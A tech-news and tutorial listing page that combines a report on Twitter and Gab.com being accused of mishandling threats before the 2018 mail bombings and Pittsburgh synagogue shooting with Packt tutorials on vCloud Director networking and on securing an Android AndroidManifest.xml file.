Facebook go to fix what it broke: Democracy, Trust, Reality Mark Zuckerberg publishes Facebook manifesto for safeguarding against political interference
Read more
  • 0
  • 0
  • 14569

article-image-social-media-platforms-twitter-and-gab-com-accused-of-facilitating-recent-domestic-terrorism-in-the-u-s
Savia Lobo
29 Oct 2018
6 min read
Save for later

Social media platforms, Twitter and Gab.com, accused of facilitating recent domestic terrorism in the U.S.

Savia Lobo
29 Oct 2018
6 min read
Updated on 30th Oct 2018: Following PayPal, two additional platforms, Stripe and Joyent have suspended Gab accounts from their respective platforms. Social media platforms Twitter and Gab.com were at the center of two shocking stories of domestic terrorism. Both platforms were used to send by the men responsible for the mail bomb attacks and Pittsburgh’s Tree of Life synagogue shooting to send cryptic threats. Following the events, both platforms have been accused of failing to act appropriately, both in terms of their internal policies, and their ability to coordinate with law enforcement to deal with the threats. Twitter fails to recognize a bomb attacker. Mail bomber sent a threat first on Twitter Twitter neglected an abuse report by a Twitter user against mail bombing suspect. Rochelle Ritchie, a former congressional press secretary, tweeted that she had received threats from Cesar Altieri Sayoc via Twitter. Sayoc was later arrested and charged in connection with mailing at least 13 suspected explosive devices to prominent Democrats, the staff at CNN, and other U.S. officials, as Bloomberg reported. On October 11, Ritchie received a tweet from an account using the handle @hardrock2016. The message was bizarre, saying, “So you like make threats. We Unconquered Seminole Tribe will answer your threats. We have nice silent Air boat ride for u here on our land. We will see you 4 sure. Hug your loved ones real close every time you leave your home.” Ritchie immediately reported this to twitter as abuse. Following this, Twitter responded that the tweet did not qualify as a “violation of the Twitter rules against abusive behavior.” The tweet was visible on Twitter until Sayoc was arrested on Friday. Ritchie tweeted again on Friday, “Hey @Twitter remember when I reported the guy who was making threats towards me after my appearance on @FoxNews and you guys sent back a bs response about how you didn’t find it that serious. Well, guess what it’s the guy who has been sending #bombs to high profile politicians!!!!” Later in the day, Twitter apologized in reply to Ritchie’s tweet saying it should have taken a different action when Ritchie had first approached them. Twitter's statement said. "The Tweet clearly violated our rules and should have been removed. We are deeply sorry for that error." Twitter has been keen to assure users that it is working hard to combat harassment and abuse on its platform. But many users disagree. https://twitter.com/Luvvie/status/1055889940150607872 Even the apology sent to Ritchie looks a lot like the company is trying to push the matter under the carpet. This wasn’t the first time Sayoc used Twitter to post his sentiments. On September 18th, Sayoc tweeted a picture of former Vice President Joe Biden’s home and wrote, "Hug your loved son, Niece, wife family real close everytime U walk out your home." On September 20, in response to a tweet from President Trump, Sayoc posted a video of himself at what appears to be a Donald Trump rally. The text of the tweet threatened former Vice President Joe Biden and former attorney general Eric Holder. Later that week, they were targeted by improvised explosive devices. Twitter suspended Sayoc's accounts late Friday afternoon last week. Shooter hinted at Pittsburgh shooting on Gab.com "It's a very horrific crime scene; One of the worst that I've seen" - Public Safety Director Wendell Hissrich said at a press conference Gab.com, which is described as “The Home Of Free Speech Online” was allegedly linked to the shooting at a synagogue in Pittsburgh on Saturday, 27th October’18. The 46-year-old suspected shooter named Robert Bowers, posted on his Gab page, “jews are the children of satan.” He also reportedly shouted “all Jews must die” before he opened the round of firing at the Tree of Life synagogue in Pittsburgh’s Squirrel Hill neighborhood. According to The Hill’s report, “Gab.com rejected claims it was responsible for the shooting after it confirmed that the name identified in media reports as the suspect matched the name on an account on its platform.” PayPal, GoDaddy suspend Gab.com for promoting hate speech Following the Pittsburgh shooting incident, PayPal has banned Gab.com. A PayPal spokesperson confirmed the ban to The Verge, citing hate speech as a reason for the action, “The company is diligent in performing reviews and taking account actions. When a site is explicitly allowing the perpetuation of hate, violence or discriminatory intolerance, we take immediate and decisive action.” https://twitter.com/getongab/status/1056283312522637312 Similarly, GoDaddy, a domain hosting website, has threatened to suspend the Gab.com domain if it fails to transfer to a new provider. Currently, Gab is inaccessible through the GoDaddy website. Gab.com denies enabling hate speech Denying the claims, Gab.com said that it has zero tolerance for terrorism and violence.“Gab unequivocally disavows and condemns all acts of terrorism and violence,” the site said in a statement. “This has always been our policy. We are saddened and disgusted by the news of violence in Pittsburgh and are keeping the families and friends of all victims in our thoughts and prayers.” Gab was quick to respond to the accusation, taking swift and proactive action to contact law enforcement. It first backed up all user data from the account and then proceeded to suspend the account. “We then contacted the FBI and made them aware of this account and the user data in our possession. We are ready and willing to work with law enforcement to see to it that justice is served”, Gab said. Gab.com also stated that the shooter had accounts on other social media platforms including Facebook, which has not yet confirmed the deactivation of the account. Federal investigators are reportedly treating the attack as a potential hate crime. This incident is a stark reminder of how online hate can easily escalate into the real world. It also sheds light on how easy it is to misuse any social media platform to post threat attacks; some of which can also be a hoax. Most importantly it underscores how social media platforms are ill-equipped to not just identify such threats but also in prioritizing manually flagged content by users and in alerting concerned authorities on time to avert tragedies such as this. To gain more insights on these two scandals, head over to CNN and The Hill. 5 nation joint Activity Alert Report finds most threat actors use publicly available tools for cyber attacks Twitter on the GDPR radar for refusing to provide a user his data due to ‘disproportionate effort’ involved 90% Google Play apps contain third-party trackers, share user data with Alphabet, Facebook, Twitter, etc: Oxford University Study
Read more
  • 0
  • 0
  • 14504

article-image-vcloud-networks
Packt
13 Sep 2013
14 min read
Save for later

vCloud Networks

Packt
13 Sep 2013
14 min read
(For more resources related to this topic, see here.) Basics Network Virtualization is what makes vCloud Director such an awesome tool. However, before we go full out in the next article, we need to set up the Network virtualization, and this is what we will be focusing on here. When we talk about isolated networks we are talking about vCloud director making use of different methods of Network Layer three encapsulation (OSI/ISO model). Basically it is the same concept as was introduced with VLANs. VLANs split up the network communication in physical network cables in different totally isolated communication streams. vCloud makes use of these isolated networks to create isolated Org and vApp Networks. VCloud Director has three different Network items: An external network is a network that exists outside the vCloud, for example, a production network. It is basically a PortGroup in vSphere that is used in vCloud to connect to the outside world. An External Network can be connected to multiple Organization Networks. External Networks are not virtualized and are based on existing PortGroups on a vSwitch or Distributed vSwitch. An organization network (Org Net) is a network that exists only inside one organization. You can have multiple Org Nets in an organization. Organizational Networks come in three different shapes: Isolated: An isolated Org Net exists only in this organization and is not connected to an external network; however, it can be connected to vApp networks or VMs. This network type uses network virtualization and its own Network setting. Routed Network (Edge Gateway): An Org Network connects to an existing Edge Device. An Edge Gateway allows defining firewall, NAT rules, as well as VPN connections and load balance functionality. Routed gateways connect external networks to vApp networks and/or VMs. This Network uses virtualized networks and its own Network setting. Directly connected: These Org Nets are an extension of an external network into the organization. They directly connect external networks to the vApp networks or VMs. These networks do NOT use network virtualization and they make use of the network settings of an External Network. A vApp network is a virtualized network that only exists inside a vApp. You can have multiple vApp networks inside one vApp. A vApp network can connect to VMs and to Org networks. It has its own network settings. When connecting a vApp Network to an Org Network you can create a Router between the vApp and the Org Network that lets you define DHCP, Firewall, NAT rules and Static Routing. To create isolated networks, vCloud Director uses Network Pools. Network pools are collection of VLANs, PortGroups and VLANs that can use L2 in L3 encapsulation. The content of these pools can be used by Org and vApp Networks for network virtualization. Network Pools There are four kinds of network pools that can be created: VXLAN: VXLAN networks are Layer 2 networks that are encapsulated in Layer 3 packages. VMware calls this Software Defined Networking (SDN). VXLANs are automatically created by vCD, however, they don't work out of the box and require some extra configuration in vCloud Network and Security (see later) Network isolation-backed: These are basically the same as VXLANs, however, they work out of the box and use Mac in Mac encapsulation. The difference is that VXLAN can transcend routers, network isolation-backed networks can't. vSphere Portgroups backed: vCD will use pre-created portgroups to build the vApp or organization networks. You need to pre-provision one portgroup for every vApp/Org network you would like to use. VLAN backed: vCD will use a pool of VLAN numbers to automatically provision portgroups on demand; however, you still need to configure the VLAN trunking. You will need to reserve one VLAN for every vApp/Org network you would like to use. VXLANs and network isolation networks solve the problems of pre-provisioning and reserving a multitude of VLANs, which makes them extremely important. However using PortGroup or VLAN Network Pools can have additional benefits that we will explore later. Types of vCloud Network VCloud Director has basically 3 different Network items. An external network is basically a PortGroup in vSphere that is imported into vCloud. An Org Network is an isolated network that exists only in an Organization. The same is true for vApp Network, they exist only in vApps. In the picture above you can see all possible connections. Let’s play through the scenarios and see how one can use them Isolated vApp Network An Isolated vApp network exist only inside a vApp. They are useful if one needs to test how VM’s behave in a network or to test using an IP range that is already in use (e.g. Production). The downside of them is that they are isolated, meaning it is hard to get information or software in and out. Have a look at the Recipe for RDP (or SSH) forward into an isolated vApp to find some answers to this problem. VMs directly connected to External Network VM’s inside a vApp are connected to a direct OrgNet, meaning they will be able to get IP’s from the External Network pool. Typically these VM’s are used for Production, meaning that customers choose vCloud for fast provisioning of predefined templates. As vCloud manages the IP’s for a given IP range it can be quite easy to fast provision a VM. vApp Network connected via vApp Router to External network VMs are connected to a vApp Network that has a vApp Router defined as its Gateway. The Gateway connects to a direct OrgNet, meaning that the Gateway will be automatically be given an IP from the External Network Pool. These configurations come in handy to reduce the amount of “physical” Networking that has to be done. The vApp Router can act as a Router with defined Firewall rules, it can do SNAT and DNAT as well as define static routing. So instead of using up a “physical” VLAN or SubNet, one can hide away applications this way. As an added benefit these Applications can be used as templates for fast deployment. VMs direct connected to isolated OrgNet VMs are connected directly to an isolated OrgNet. Connecting VMs directly to an Isolated Network normally only makes sense if there is more than one vApp/VM connected to the OrgNet. What they are used for is an extension of the isolated vApp concept. You need to test repeatedly complex Applications that require certain infrastructure like Active Directory, DHCP, DNS, Database, Exchange Servers etc. Instead of deploying large isolated vApps that contain these, you could deploy them in one vApp and connect them via an Isolated OrgNet directly to the vApp that contains your testing VMs. This makes it possible to reuse this base infrastructure. By using Sharing you even can hide away the Infrastructure vApp from your users. vApp connected via vApp Router to isolate OrgNet VMs are connected to an vApp network that has as its Gateway a vApp Router . The vApp router gets automatically its IP from the OrgNet Pool. Basically, a variant of the idea before. A test vApp or an infrastructure vApp can be packaged this way and be made ready for fast deployment. VMs connected directly to Edge VMs are directly connected to the Edge OrgNet and get their IP from the OrgNet Pool. Their Gateway is the Edge device that connects them to the External Networks through the Edge Firewall. A very typical setup is using the Edge Load balancing feature to load balance VM’s out of a vApp via the Edge. Another one is that the Organization is secured using the Edge Gateway against other Organizations that use the same External Network. This is mostly the case if the External Network is the internet and each Organization is an external customer. vApp connected to Edge via vApp Router VMs are connected to a vApp network that has the vApp router as its Gateway. The vApp Router will automatically get an IP form the OrgNet, which has its Gateway the Edge. This is a more complicated variant of the above scenario, allowing customers to package their VM’s, secure them against other vApps or VMs or subdivide their allocated networks. IP Management Let’s have a look into IP management with vCloud. vCloud knows about three different settings for IP management of VM’s. DHCP You need to provide a DHCP, vCloud doesn’t automatically create one. However a vApp Router or an Edge can create one. Static – IP Pool The IP for the VM comes from the Static IP Pool of the network it is connected to. In addition to that DNS and Domain Suffix will be written to the VM. Static – Manual The IP can be defined on the spot; however, it must be in the network defined by the Gateway and the Network mask of the network the VM is connected to. In addition to that, DNS and Domain Suffix will be written to the VM. All these settings require Guest Customization to be effective. If no Guest Customization is selected, it doesn’t work and whatever the VM was configured with as a Template will be used. vSphere and vCloud vApps One think that need to be said about vApps is that they actually come in two completely different versions. The vCenter vApp and the vCloud vApp. The vSphere vApp concept was introduced in vSphere 4.0 as a container for VMs. In vSphere a vApp is essentially a resource pool with some extras, such as starting and stopping order and (if you configured it) Network IP allocation method. The idea is it to have an entity of VMs that build one unit. Such vApp then can be exported or imported using the OVF format. A very good example for an vApp is VMware Operations Manager. It comes as a vApp in an OVF format and contains not only the VMs but also the start-up sequence as well as some setup script. When the vApp is deployed the first time, additional information like Network settings are asked and then implemented. As vSphere vApp is a resource pool, it can be configured so that it will only demand resources that it is using; on the other hand resource pool configuration is something that most people struggle with. A vSphere vApp is ONLY a resource pool, it is not automatically a folder in the Folder and Template View of vSphere, but is viewed there as again as a vApp. The vCloud vApp is a very different concept; first of all it is not a resource pool. The VMs of the vCloud vApp live in the OvDC resource Pool. However the vCloud vAppp is automatically a folder in the Folder and Template View of vSphere. It is a construct that is created by vCloud, it consists of VMs, a Start and Stop sequence and Networks. The Network part is one of the major differences (next to the resource pool). In vSphere only network information, like how IPs gets assigned to it and settings like Gateway and DNS are given to the vApp, a vCloud vApp actually encapsulates Networks. The vCloud vApp Networks are full networks, meaning they contain the full information for a given network including network settings and IP Pools. For more details see the last article. This information is kept when importing and exporting vCloud vApps. When I’m talking about vApps in the book, I will always mean vCloud vApps. vCenter vApp, if they feature will be written as vCenter vApp. Datastores, profiles and clusters I probably don’t have to explain what a datastore is, but here is a short intro just in case . A Datastore is a VMware object that exists in ESXi. This Object can be a hard disk that is attached to an ESXi server, a NFS or iSCSSI mount on a ESXi host or an fibre channel disk that is attached to an HBA on the ESXi server. A Storage Profile is a container that contains one or more Datastores. A Storage Profile doesn’t have any intelligence implemented, it just groups the Storage. However, it is extremely beneficial in vCloud. If you run out of storage on a datastore you can just add another datastore to the same Storage Profile and your back in business. Datastore Clusters again are containers for datastores, but now there is intelligence included. A Datastore Cluster can use Storage DRS, which allows for VMs to automatically use Storage vMotion to move from one datastore to another if the I/O latency is high or the storage low. Depending on your storage backend system this can be extremely useful. vCloud Director doesn’t know the difference between a Storage Profile and a Datastore Cluster. If you add a Datastore cluster, vCloud will pick it up as a Storage Profile, but that’s ok because it’s not a problem at all. Be aware that Storage profiles are part of the vSphere Enterprise Plus licensing. If you don’t have Enterprise Plus you won’t get storage profiles, and the only thing you can do in vCloud is use the storage profile ANY, which doesn’t contribute to productivity. Thin provisioning Thin Provisioning means that the file that contains the virtual hard disk (.vmdk) is only as big as the the amount of data written to the virtual hard disk.. As an example, if you have a 40GB hard disk attached to a Windows VM and have just installed Windows on it you are using around 2GB of the 40GB disk. When using Thin provisioning only 2GB will be written to the datastore not 40GB. If you don’t use thin provisioning the .vmdk file wil be 40GB big. If your storage vendors Storage APIs is integrated in your ESXi servers Thin Provisioning may be offloaded to your storage backend, making it even faster. Fast Provisioning Fast provisioning is similar to linked clones that you may know from Lab Manager or VMware View. However, in vCloud they are a bit more intelligent than in the other products. In the other products linked clones can NOT be deployed across different datastores but in vCloud they can. Let’s talk about how linked clones work. If you have a VM with a hard disk of 40GB and you clone that VM you would normally have to spend another 40GB (not using Thin Provisioning). Using Linked clones you will not need another 40GB but less. What happens in layman’s terms is that vCloud creates two snapshots of the original VM’s hard disk. A snapshot contains only the differences between the original and the Snapshot. The original hard disk (.vmdk file) is set to read-only and the first snapshot is connected to the original VM, so that one still can work with the original VM. The second snapshot is used to create the new VM. Using snapshots makes deploying a VM using Fast Provisioning not only Fast but it also saves a lot of disk space. The problem with this is that a snapshot must be on the same datastore as its source. So if you have a VM in one datastore, its linked clone cannot be in another. vCloud has solved that problem by deploying a Shadow VM. When you deploy a VM with Fast Provisioning onto a different datastore than its source, vCloud creates a full clone (a normal full copy) of the VM onto the new datastore and then creates a linked clone from the Shadow VM. If your storage vendors Storage APIs is integrated in your ESXi servers Fast Provisioning may be offloaded to your storage backend, making it faster. See also recipe “Making NFS based datastores faster”. Summary In this article, we saw vCloud networks, vSphere and vCloud vApps, and datastores, profiles and clusters. Resources for Article :   Further resources on this subject: Windows 8 with VMware View [Article] VMware View 5 Desktop Virtualization [Article] Cloning and Snapshots in VMware Workstation [Article]
Read more
  • 0
  • 0
  • 14438
article-image-defining-applications-policy-file
Packt
23 Aug 2013
21 min read
Save for later

Defining the Application's Policy File

Packt
23 Aug 2013
21 min read
(For more resources related to this topic, see here.) The AndroidManifest.xml file All Android applications need to have a manifest file. This file has to be named as AndroidManifest.xml and has to be placed in the application's root directory. This manifest file is the application's policy file. It declares the application components, their visibility, access rules, libraries, features, and the minimum Android version that the application runs against. The Android system uses the manifest file for component resolution. Thus, the AndroidManfiest.xml file is by far the most important file in the entire application, and special care is required when defining it to tighten up the application's security. The manifest file is not extensible, so applications cannot add their own attributes or tags. The complete list of tags with how these tags can be nested is as follows: <uses-sdk><?xml version="1.0" encoding="utf-8"?> <manifest> <uses-permission /> <permission /> <permission-tree /> <permission-group /> <instrumentation /> <uses-sdk /> <uses-configuration /> <uses-feature /> <supports-screens /> <compatible-screens /> <supports-gl-texture /> <application> <activity> <intent-filter> <action /> <category /> <data /> </intent-filter> <meta-data /> </activity> <activity-alias> <intent-filter> </intent-filter> <meta-data /> </activity-alias> <service> <intent-filter> </intent-filter> <meta-data/> </service> <receiver> <intent-filter> </intent-filter> <meta-data /> </receiver> <provider> <grant-uri-permission /> <meta-data /> <path-permission /> </provider> <uses-library /> </application> </manifest> Only two tags, <manifest> and <application>, are the required tags. There is no specific order to declare components. The <manifest> tag declares the application specific attributes. It is declared as follows: <manifest package="string" android_sharedUserId="string" android_sharedUserLabel="string resource" android_versionCode="integer" android_versionName="string" android_installLocation=["auto" | "internalOnly" | "preferExternal"] > </manifest> An example of the <manifest> tag is shown in the following code snippet. In this example, the package is named com.android.example, the internal version is 10, and the user sees this version as 2.7.0. The install location is decided by the Android system based on where it has room to store the application. <manifest package="com.android.example" android_versionCode="10" android_versionName="2.7.0" android_installLocation="auto" > The attributes of the <manifest> tag are as follows: package: This is the name of the package. This is the Java style namespace of your application, for example, com.android.example. This is the unique ID of your application. If you change the name of a published application, it is considered a new application and auto updates will not work. android:sharedUserId: This attribute is used if two or more applications share the same Linux ID. This attribute is discussed in detail in a later section. android:sharedUserLabel: This is the user readable name of the shared user ID and only makes sense if android:sharedUserId is set. It has to be a string resource. android:versionCode: This is the version code used internally by the application to track revisions. This code is referred to when updating an application with the more recent version. android:versionName: This is the version of the application shown to the user. It can be set as a raw string or as a reference, and is only used for display to users. android:installLocation: This attribute defines the location where an APK will be installed. The application tag is defined as follows: <application android_allowTaskReparenting=["true" | "false"] android_backupAgent="string" android_debuggable=["true" | "false"] android_description="string resource" android_enabled=["true" | "false"] android_hasCode=["true" | "false"] android_hardwareAccelerated=["true" | "false"] android_icon="drawable resource" android_killAfterRestore=["true" | "false"] android_largeHeap=["true" | "false"] android_label="string resource" android_logo="drawable resource" android_manageSpaceActivity="string" android_name="string" android_permission="string" android_persistent=["true" | "false"] android_process="string" android_restoreAnyVersion=["true" | "false"] android_supportsRtl=["true" | "false"] android_taskAffinity="string" android_theme="resource or theme" android_uiOptions=["none" | "splitActionBarWhenNarrow"] > </application> An example of the <application> tag is shown in the following code snippet. In this example, the application name, description, icon, and label are set. The application is not debuggable and the Android system can instantiate the components. <application android_label="@string/app_name" android_description="@string/app_desc" android_icon="@drawable/example_icon" android_enabled="true" android_debuggable="false"> </application> Many attributes of the <application> tag serve as the default values for the components declared within the application. These tags include permission, process, icon, and label. Other attributes such as debuggable and enabled are set for the entire application. The attributes of the <application> tag are discussed as follows: android:allowTaskReparenting: This value can be overridden by the <activity> element. It allows an Activity to re-parent with the Activity it has affinity with, when it is brought to the foreground. android:backupAgent: This attribute contains the name of the backup agent for the application. android:debuggable: This attribute when set to true allows an application to be debugged. This value should always be set to false before releasing the app in the market. android:description: This is the user readable description of an application set as a reference to a string resource. android:enabled: This attribute if set to true, the Android system can instantiate application components. This attribute can be overridden by components. android:hasCode: This attribute if set to true, the application will try to load some code when launching the components. android:hardwareAccelerated: This attribute when set to true allows an application to support hardware accelerated rendering. It was introduced in the API level 11. android:icon: This is the application icon as a reference to a drawable resource. android:killAfterRestore: This attribute if set to true, the application will be terminated once its settings are restored during a full-system restore. android:largeHeap: This attribute lets the Android system create a large Dalvik heap for this application and increases the memory footprint of the application, so this should be used sparingly. android:label: This is the user readable label for the application. android:logo: This is the logo for the application. android:manageSpaceActivity: This value is the name of the Activity that manages the memory for the application. android:name: This attribute contains the fully qualified name of the subclass that will be instantiated before any other component is started. android:permission: This attribute can be overridden by a component and sets the permission that a client should have to interact with the application. android:persistent: Usually used by a system application, this attribute allows the application to be running all the time. android:process: This is the name of the process in which a component will run. This can be overridden by any component's android:process attribute. android:restoreAnyVersion: This attribute lets the backup agent attempt a restore even if the backup currently stored is by a newer application than what is attempting to restore now. android:supportsRtl: This attribute when set to true supports right-to-left layouts. It was added in the API level 17. android:taskAffinity: This attribute lets all activities have affinity with the package name, unless it is set by the Activity explicitly. android:theme: This is a reference to the style resource for the application. android:uiOptions: This attribute if set to none, there are no extra UI options; if set to splitActionBarWhenNarrow, a bar is set at the bottom if constrained for the screen. In the following sections we will discuss how to handle specific requirements using the policy file. Application policy use cases This section discusses how to define the application policies using the manifest file. I have used use cases and we will discuss how to implement these use cases in the policy file. Declaring application permissions An application on the Android platform has to declare what resources it intends to use for proper functioning of the application. These are the permissions that are displayed to the user when they download the application. Application permissions should be descriptive so that users can understand them. Also, as is the general rule with security, it is important to request the minimum permissions required. Application permissions are declared in the manifest file by using the tag <uses-permission>. An example of a location-based manifest file that uses the GPS for retrieving location is shown in the following code snippet: <uses-permissionandroid:name="android. permission.ACCESS_COARSE_LOCATION" /> <uses-permissionandroid:name="android. permission.ACCESS_FINE_LOCATION" /> <uses-permissionandroid:name="android. permission.ACCESS_LOCATION_EXTRA_COMMANDS" /> <uses-permissionandroid:name="android. permission.ACCESS_MOCK_LOCATION" /> <uses-permissionandroid:name="android.permission.INTERNET" /> These permissions will be displayed to the users when they install the app, and can always be checked by going to Application under the settings menu. These permissions are seen in the following screenshot: Declaring permissions for external applications The manifest file also declares the permissions an external application (which does not run with the same Linux ID) needs to access the application components. This can be one of two places in the policy file: in the <application> tag or along with the component in the <activity>, <provider>, <receiver>, and <service> tag. If there are permissions that all components of an application require, then it is easy to specify them in the <application> tag. If a component requires some specific permission, then those can be defined in the specific component tag. Remember, only one permission can be declared in any of the tags. If a component is protected by permission then the component permission overrides the permission declared in the <application> tag. The following is an example of an application that requires external applications to have android.permission.ACCESS_COARSE_LOCATION to access its components and resources: <application android_allowBackup="true" android_icon="@drawable/ic_launcher" android_label="@string/app_name" android_permission="android. permission.ACCESS_COARSE_LOCATION"> If a Service requires that any application component that accesses it should have access to the external storage, then it can be defined as follows: <service android_enabled="true" android_name=".MyService" android_permission="android. permission.WRITE_EXTERNAL_STORAGE"> </service> If a policy file has both the preceding tags then when an external component makes a request to this Service, it should have android.permission.WRITE_EXTERNAL_STORAGE, as this permission will override the permission declared by the application tag. Applications running with the same Linux ID Sharing data between applications is always tricky. It is not easy to maintain data confidentiality and integrity. Proper access control mechanisms have to be put in place based on who has access to how much data. In this section, we will discuss how to share application data with the internal applications (signed by the same developer key). Android is a layered architecture with an application isolation enforced by the operating system itself. Whenever an application is installed on the Android device, the Android system gives it a unique user ID defined by the system. Notice that the two applications, example1 and example2, in the following screenshot are the applications run as separate user IDs, app_49 and app_50: However, an application can request the system for a user ID of its choice. The other application can then request the same user ID as well. This creates tight coupling and does not require components to be made visible to the other application or to create shared content providers. This kind of tight coupling is done in the manifest tags of all applications that want to run in the same process. The following is a snippet of manifest files of the two applications com.example.example1 and com.example.example2 that use the same user ID: <manifest package="com.example.example1" android_versionCode="1" android_versionName="1.0" android_sharedUserId="com.sharedID.example"> <manifest package="com.example.example2" android_versionCode="1" android_versionName="1.0" android_sharedUserId="com.sharedID.example"> The following screenshot is displayed when these two applications are running on the device. Notice that the applications, com.example.example1 and com.example.example2, now have the app ID of app_113. You will notice that the shared UID follows a certain format akin to a package name. Any other naming convention will result in an error such as an installation error: INSTALL_PARSE_FAILED_BAD_SHARED_USER_ID. All applications that share the same UID should have the same certificate. External storage Starting with API Level 8, Android provides support to store Android applications (APK files) on external devices, such as an SD card. This helps to free up internal phone memory. Once the APK is moved to external storage, the only memory taken up by the app is the private data of the application stored on internal memory. It is important to note that even for the SD card resident APKs, the DEX (Dalvik Executable) files, private data directories, and native shared libraries remain on the internal storage. Adding an optional attribute in the manifest file enables this feature. The application info screen for such an application either has a move to the SD card or move to a phone button depending on the current storage location of APK. The user then has an option to move the APK file accordingly. If the external device is un-mounted or the USB mode is set to Mass Storage (where the device is used as a disk drive), all the running activities and services hosted on that external device are immediately killed. The feature to enable storing APK on the external devices is enabled by adding the optional attribute android:installLocation in the application's manifest file in the <manifest> element. The attribute android:installLocation can have the following three values: InternalOnly: The Android system will install the application on the internal storage only. In case of insufficient internal memory, storage errors are returned. PreferExternal: The Android system will try to install the application on the external storage. In case there is not enough external storage, the application will be installed on the internal storage. The user will have the ability to move the app from external to internal storage and vice versa as desired. auto: This option lets the Android system decide the best install location for the application. The default system policy is to install the application on internal storage first. If the system is running low on internal memory, the application is then installed on the external storage. The user will have the ability to move the application from external to internal storage and vice versa as desired. For example, if android:installLocation is set to Auto, then on devices running a version of Android less than 2.2, the system will ignore this feature and APK will only be installed on the internal memory. The following is the code snippet from an application's manifest file with this option: <manifest package="com.example.android" android_versionCode="10" android_versionName="2.7.0" android_installLocation="auto" > The following is a screenshot of the application with the manifest file as specified previously. You will notice that Move to SD card is enabled in this case: In another application, where android:installLocation is not set, the Move to SD Card is disabled as shown in the following screenshot: Setting component visibility Any of the application components namely, activities, services, providers, and receivers can be made discoverable to the external applications. This section discusses the nuances of such scenarios. Any Activity or Service can be made private by setting android:exported=false. This is also the default value for an Activity. See the following two examples of a private Activity: <activity android_name=".Activity1" android_exported="false" /> <activity android_name=".Activity2" /> However, if you add an Intent Filter to the Activity, then the Activity becomes discoverable for the Intent in the Intent Filter. Thus, the Intent Filter should never be relied upon as a security boundary. See the following examples for Intent Filter declaration: <activity android_name=".Activity1" android_label="@string/app_name" > <intent-filter> <action android_name="android.intent.action.MAIN" /> <category android_name="android.intent.category.LAUNCHER" /> </intent-filter> </activity> <activity android_name=".Activity2"> <intent-filter> <action android_name="com.example.android. intent.START_ACTIVITY2" /> </intent-filter> </activity> Both activities and services can also be secured by an access permission required by the external component. This is done using the android:permission attribute of the component tag. A Content Provider can be set up for private access by using android:exported=false. This is also the default value for a provider. In this case, only an application with the same ID can access the provider. This access can be limited even further by setting the android:permission attribute of the provider tag. A Broadcast Receiver can be made private by using android:exported=false. This is the default value of the receiver if it does not contain any Intent Filters. In this case, only the components with the same ID can send a broadcast to the receiver. If the receiver contains Intent Filters then it becomes discoverable and the default value of android:exported is false. Debugging During the development of an application, we usually set the application to be in the debug mode. This lets developers see the verbose logs and can get inside the application to check for errors. This is done in the <application> tag by setting android:debuggable to true. To avoid security leaks, it is very important to set this attribute to false before releasing the application. An example of sensitive information that I have seen in my experience includes usernames and passwords, memory dumps, internal server errors, and even some funny personal notes state of a server and a developer's opinion about a piece of code. The default value of android:debuggable is false. Backup Starting with API level 8, an application can choose a backup agent to back up the device to the cloud or server. This can be set up in the manifest file in the <application> tag by setting android:allowBackup to true and then setting android:backupAgent to a class name. The default value of android:allowBackup is set to true and the application can set it to false if it wants to opt out of the backup. There is no default value for android:backupAgent and a class name should be specified. The security implications of such a backup are debatable as services used to back up the data are different and sensitive data, such as usernames and passwords can be compromised. Putting it all together The following example puts all the learning we have done so far to analyze AndroidManifest.xml provided with an Android SDK sample for RandomMusicPlayer. The manifest file specifies that this is version 1 of the application com.example.android.musicplayer. It runs on SDK 14 but supports backwards up to SDK 7. The application uses two permissions namely, android.permission.INTERNET and android.permission.WAKE_LOCK. The application has one Activity that is the entry point for the application called MainActivity, one Service called MusicService, and one receiver called MusicIntentReceiver. MusicService has defined custom actions called PLAY, REWIND, PAUSE, SKIP, STOP, and TOGGLE_PLAYBACK. The receiver uses the action intent android.media.AUDIO_BECOMING_NOISY and android.media.MEDIA_BUTTON defined by the Android system. None of the components are protected with permissions. An example of an AndroidManifst.xml file is shown in the following screenshot: Example checklist In this section, I have tried to put together an example list that I suggest you refer to whenever you are ready to release a version of your application. This is a very general version and you should adapt it according to your own use case and components. When creating a checklist think about issues that relate to the entire application, those that are specific to a component, and issues that might come up by setting the component and application specification together. Application level In this section, I have listed some questions that you should be asking yourself as you define the application specific preferences. They may affect how your application is viewed, stored, and perceived by users. Some application level questions that you may like to ask are as follows: Do you want to share resources with other applications that you have developed? Did you specify the unique user ID? Did you define this unique ID for another application either intentionally or unintentionally? Does your application require some capabilities such as camera, Bluetooth, and SMS? Does your application need all these permissions? Is there another permission that is more restrictive than the one you have defined? Remember the principle of least privilege Do all the components of your application need this permission or only a few? Check the spellings of all the permissions once again. The application may compile and work even if the permission spelling is incorrect. If you have defined this permission, is this the correct one that you need? At what API level does the application work? What is the minimum API level that your application can support? Are there any external libraries that your application needs? Did you remember to turn off the debug attribute before you release? If you are using a backup agent then remember to mention it here Did you remember to set a version number? This will help you during application upgrade Do you want to set an auto upgrade? Did you remember to sign the application with your release key? Sometimes setting a particular screen orientation will not allow your application to be visible on certain devices. For example, if your application only supports portrait mode then it might not appear for devices with landscape mode only. Where do you want to install the APK? Are there any services that might cease to work if the intent is not received in time? Do you want some other application level settings, such as the ability of the system to restore components? If defining a new permission, think twice if you really want them. Chances are there is already an existing permission that will cover your use case. Component level Some component level questions that you will want to think about in the policy are listed here. These are questions that you should be asking yourself for each component: Did you define all components? If using the third party libraries in your application, did you define all the components that you will use? Was there a particular setting that the third party library expects from your application? Do you want this component to be visible to other applications? Do you need to add some Intent Filters? If the component is not supposed to be visible, did you add Intent Filters? Remember as soon as you add Intent Filters, your component becomes visible. Do other components require some special permission to trigger this component? Verify the spelling of the permission name. Does your application require some capabilities such as camera, Bluetooth, and SMS? Summary In this article, we've learned how to define an applications policy file. The manifest file is the most important artifact of an application and should be defined with utmost care. This manifest file declares the permissions requested by an application and permissions that the external applications need to access its components. With the policy file we also define the storage location of the out APK and the minimum SDK against which the out application will run. The policy file exposes components that are not sensitive to the application. At the end of this article we discussed some sample issues that a developer should be aware of when writing a manifest file. In this article, we've learned about an Android application structure. Resources for Article: Further resources on this subject: So, what is Spring for Android? [Article] Animating Properties and Tweening Pages in Android 3-0 [Article] New Connectivity APIs – Android Beam [Article]
Read more
  • 0
  • 0
  • 13886

article-image-bloombergs-big-hack-expose-says-china-had-microchips-on-servers-for-covert-surveillance-of-big-tech-and-big-brother-big-tech-deny-supply-chain-compromise
Savia Lobo
05 Oct 2018
4 min read
Save for later

Bloomberg's Big Hack Exposé says China had microchips on servers for covert surveillance of Big Tech and Big Brother; Big Tech deny supply chain compromise

Savia Lobo
05 Oct 2018
4 min read
